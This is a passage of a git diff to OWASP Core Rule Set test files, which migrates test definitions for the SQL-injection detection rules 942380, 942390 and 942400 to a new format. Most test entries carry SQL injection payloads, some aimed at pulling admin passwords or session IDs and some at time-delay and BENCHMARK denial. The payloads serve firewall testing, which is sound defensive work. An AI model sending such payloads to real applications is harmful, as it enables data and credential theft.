text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-45 + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ORder by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ordeR by" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute php" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Execute(" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute+elysi" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute node_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute scald" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute system" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute user_" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute views" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute patha" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute workb" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute panel" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] + - test_id: 45 desc: "SQL Injection Attack: EXISTS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" - version: HTTP/1.0 - output: - log_contains: id "942380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942380] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 62e8200..05ce6b9 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -1,23 +1,21 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942390.yaml +rule_id: 942390 tests: - - test_title: 942390-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=sdfsd%27or%201%20%3e%201" - version: HTTP/1.0 - output: - log_contains: id "942390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942390] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 7845fb9..2de63c4 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942400.yaml +rule_id: 942400 tests: - - test_title: 942400-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and '5'orig_var_datavarname=whatever" - version: HTTP/1.0 - output: - log_contains: id "942400" - - test_title: 942400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary 